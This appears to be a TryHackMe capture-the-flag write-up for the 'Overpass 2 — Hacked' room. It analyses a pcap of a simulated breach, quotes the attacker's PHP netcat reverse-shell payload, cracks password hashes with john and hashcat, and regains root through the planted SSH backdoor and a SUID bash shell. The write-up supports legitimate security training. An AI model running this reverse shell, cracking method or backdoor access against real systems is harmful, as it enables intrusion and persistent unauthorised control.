TryHackMe | Overpass 2 — Hacked

Overpass has been hacked! Can you analyze the attacker’s actions and hack back in?

Attack summary:

• This challenge has provided you a .pcap file to analyze.
• Identifying where the hackers upload their payload.
• Search in pcap file what script they used for reverse shell.
• Identifying what password they used to escalate privilege.
• Identifying what persistent access they’ve been used.
• Trying to crack the their generated password.
• Using their own backdoor to gain back the server as root privilege.

Task 1 Forensics — Analyze the PCAP

• What was the URL of the page they used to upload a reverse shell?

/development

• What payload did the attacker use to gain access?

Filter: tcp contains upload

Follow : TCP Stream

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

Analyzing further the pcap file.

Filter: tcp contains password

it will show you the single network traffic.

By following this TCP Stream, it will show you a bunch of useful information.

Password hash and what backdoor they’ve been used.

Port and password hacker’s generated.

• What password did the attacker use to privesc?

whenevernoteartinstant

• How did the attacker establish persistence?

https://github.com/NinjaJc01/ssh-backdoor

GitHub - NinjaJc01/ssh-backdoor

• Using the fasttrack wordlist, how many of the system passwords were crackable?

4

john --wordlist=/usr/share/wordlists/fasttrack.txt passwd.hash
abcd123          (szymex)
1qaz2wsx         (muirland)
secuirty3        (paradox)
secret12         (bee)

Task 2 Research — Analyse the code

• What’s the default hash for the backdoor?

Downloading the backdoor script.

┌──(root💀kali)-[/home/…/Tryhackme/OSCPprep/Overpass2/ssh-backdoor]
└─# cat main.go
)
var hash string = "bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3"
func main() {

Default hash

bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3

• What’s the hardcoded salt for the backdoor?

This one is still in main.go file.

return verifyPass(hash, "1c362db832f3f864c8c2fe05f2002a05", password)

Hardcoded salt

1c362db832f3f864c8c2fe05f2002a05

• What was the hash that the attacker used? — go back to the PCAP for this!

Attacker’s hash

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

• Crack the hash using rockyou and a cracking tool of your choice. What’s the password?

Analyzing the main.go script.

As noticed, the format used for generating hash is:

hash := sha512.Sum512([]byte(password + salt))
Format:sha512(password+salt)

searching for mode we can use in hashcat.

-m 1710

Save the hash and the hardcoded salt. hash:salt

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05

Fireup hashcat.

└─# hashcat -m 1710 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt

-m 1710 : mode

-a 0 : attack-mode, 0 for straight mode.

-o cracked.txt : this is where the cracked password will save.

Password: november16

Task 3 Attack — Get back in!

Now that the incident is investigated, Paradox needs someone to take control of the Overpass production server again.

There’s flags on the box that Overpass can’t afford to lose by formatting the server!

• The attacker defaced the website. What message did they leave as a heading?

H4ck3d by CooctusClan

• Using the information you’ve found previously, hack your way back in!

Login via ssh using the backdoor port.

└─# ssh -p 2222 james@10.10.251.85

Getting the user.txt

james@overpass-production:/home/james$ cat user.txt
thm{d119b4fa8c497ddb0525***********}

It seems that the hacker leave a instant root script.

execute the .suid_bash with -p options.
-p privileged
this option can switch to root shell without password.

comparison

with -p option

get the root.txt flag.

.suid_bash-4.4# cat /root/root.txt
thm{d53b2684f169360bb9606**********}

Thank you for taking time to read, hope you find this one helpful. :D

If you have any suggestions, feel free to message me in LinkedIn.